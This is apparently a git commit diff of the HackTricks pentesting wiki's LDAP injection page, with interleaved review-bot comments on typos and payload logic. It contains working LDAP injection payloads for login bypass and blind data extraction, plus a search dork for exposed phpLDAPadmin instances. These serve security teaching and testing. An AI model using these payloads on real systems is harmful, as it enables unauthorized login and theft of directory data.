mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-21 20:23:18 +00:00
GitBook: [master] 2 pages and 4 assets modified
parent: c2b98f8fb4
commit: a24d4e91d6
6 changed files with 32 additions and 15 deletions
Binary file not shown (modified; before: 73 KiB, after: 96 KiB).
.gitbook/assets/image (536).png: new binary file, 96 KiB
.gitbook/assets/image (537).png: new binary file, 73 KiB
.gitbook/assets/image (538).png: new binary file, 205 KiB
@ -27,30 +27,28 @@
**\(\|\)** = Absolute FALSE
For example:
\(&\(!\(objectClass=Impresoras\)\)\(uid=s\*\)\)
\(&\(objectClass=user\)\(uid=\*\)\)
`(&(!(objectClass=Impresoras))(uid=s*))
(&(objectClass=user)(uid=*))`
You can access to the database, and this can content information of a lot of different types.
The backups of LDAP uses the extension _ldif_
**OpenLDAP**: If 2 filters arrive, only executes the first one.
**ADAM or Microsoft LDS**: With 2 filters they throw an error.
**SunOne Directory Server 5.0**: Execute both filters.
**It is very important to send the filter with correct syntax or an error will be thrown. It is better to send only 1 filter.**
The filter has to start with: _&_ or _\|_
Example: _\(&\(directory=val1\)\(folder=public\)\)_
The filter has to start with: `&` or `|`
Example: `(&(directory=val1)(folder=public))`
\(&\(objectClass=VALUE1\)\(type=Epson\*\)\)
VALUE1 = _\*\)\(ObjectClass=\*\)\)\(&\(objectClass=void_
`(&(objectClass=VALUE1)(type=Epson*))
VALUE1 = *)(ObjectClass=*))(&(objectClass=void`
Then: _\(&\(objectClass=**\*\)\(ObjectClass=\*\)\)**_ will be the first filter \(the one executed\).
Then: `(&(objectClass=`**`*)(ObjectClass=*))`** will be the first filter \(the one executed\).
## Login Bypass
LDAP supports several formats to store the password: clear, md5, smd5, sh1, ssha, crypt. So, it could be that independently of what you insert inside the password, it is hashed.
LDAP supports several formats to store the password: clear, md5, smd5, sh1, sha, crypt. So, it could be that independently of what you insert inside the password, it is hashed.
```bash
user=*
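Review bot: the edited password-scheme line `LDAP supports several formats to store the password: clear, md5, smd5, sh1, sha, crypt.` drops `ssha`, which is a real and widely deployed scheme ({SSHA}, salted SHA-1), while `sh1` reads like a typo for `sha1`; suggest `clear, md5, smd5, sha, ssha, crypt` so every entry names a scheme that exists. In the same hunk, `(&(objectClass=`**`*)(ObjectClass=*))`** puts bold markers between two inline-code spans to highlight the injected part; it renders, but a single code span `(&(objectClass=*)(ObjectClass=*))` with the injected portion named in the prose is less fragile across markdown renderers. While this text is being touched, the untouched line `You can access to the database, and this can content information of a lot of different types.` should read `can contain information`.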
@ -92,7 +90,7 @@ password=pwd
```bash
username = admin)(!(&(|
pass = any))
--> (&(uid= admin)(!(& (|) (webpassword=any)))) —> As (|) is FALSO then the user is admin and the password check is True.
--> (&(uid= admin)(!(& (|) (webpassword=any)))) —> As (|) is FALSE then the user is admin and the password check is True.
```
```bash
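Review bot: the FALSO to FALSE fix is right and the reasoning on that line holds: `(|)` with no operands is absolute false, so `(&(|)(webpassword=any))` is false, the surrounding `!` turns it true, and `(uid=admin)` is the only condition left to satisfy; the filter built from `admin)(!(&(|` and `any))` is also paren-balanced, which is why it parses as a single valid filter. One clarification worth adding to the line: the spaces in `(uid= admin)` and `(& (|) (webpassword=any))` are illustrative only, since the two inputs contain none, and whitespace inside a filter value is literal, so a reader copying the displayed filter verbatim would be searching for a different value.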
@ -107,12 +105,29 @@ password=any
--> (&(uid=admin)) (| (|) (webpassword=any))
```
### Lists
[LDAP\_FUZZ](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP_FUZZ.txt)
[LDAP Attributes](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP_attributes.txt)
[LDAP\_authBypass](https://feelsec.info/wp-content/uploads/2018/11/LDAP_authBypass.txt)
[LDAP Attributes](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP_attributes.txt)
## Blind LDAP Injection
You may force False or True responses to check if any data is returned and confirm a possible Blind LDAP Injection:
```bash
#This will result on True, so some information will be shown
Payload: *)(objectClass=*))(&objectClass=void
Final query: (&(objectClass= *)(objectClass=*))(&objectClass=void )(type=Pepi*))
```
```bash
#This will result on True, so no information will be returned or shown
Payload: void)(objectClass=void))(&objectClass=void
Final query: (&(objectClass= void)(objectClass=void))(&objectClass=void )(type=Pepi*))
```
### Dump data
You can iterate over the ascii letters, digits and symbols:
```bash
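Review bot: the comment `#This will result on True, so no information will be returned or shown` above the `void)(objectClass=void))(&objectClass=void` payload contradicts itself; that payload is the False half of the True/False pair (`(objectClass=void)` matches nothing), so it should read `#This will result on False, so no information will be returned or shown`. Also, the new Lists section contains `[LDAP Attributes](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP_attributes.txt)` twice with the same URL; drop the second entry.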
@ -130,7 +145,7 @@ You can iterate over the ascii letters, digits and symbols:
### **Discover valid LDAP fields**
LDAP objects **contains by default several attributes** that could be used to **save information**. You can try to **brute-force all of them to extract that info.** You can find a list of **\*\*\[**default LDAP attributes here**\]\(**[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP Injection/Intruder/LDAP\_attributes.txt](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP_attributes.txt)**\)**.\*\*
LDAP objects **contains by default several attributes** that could be used to **save information**. You can try to **brute-force all of them to extract that info.** You can find a list of [**default LDAP attributes here**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP_attributes.txt).
```python
#!/usr/bin/python3
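Review bot: the link repair in `You can find a list of [**default LDAP attributes here**](...)` is correct; since the sentence is being rewritten anyway, `LDAP objects **contains by default several attributes**` should become `contain by default several attributes`.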
@ -189,5 +204,7 @@ for i in range(50):
intitle:"phpLDAPadmin" inurl:cmd.php
```
## More Payloads
[https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection)
@ -25,7 +25,7 @@ These kind of APIs may be [**vulnerable to XXE**](../../pentesting-web/xxe-xee-x
You could also try to use CDATA tags to insert payloads \(as long as the XML is valid\)
![](../../.gitbook/assets/image%20%28535%29.png)
![](../../.gitbook/assets/image%20%28537%29.png)
### Check Access
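Review bot: this hunk swaps the screenshot from `image%20%28535%29.png` to `image%20%28537%29.png`, but the commit adds three assets (536, 537 and 538) and only 537 is referenced in the visible hunks; confirm 536 and 538 are used by the other modified page and that 535 is still referenced somewhere, otherwise it is now an orphaned asset. The unchanged context line `You could also try to use CDATA tags to insert payloads \(as long as the XML is valid\)` still carries the escaped parentheses that the rest of this commit removes; unescaping it here keeps the page consistent.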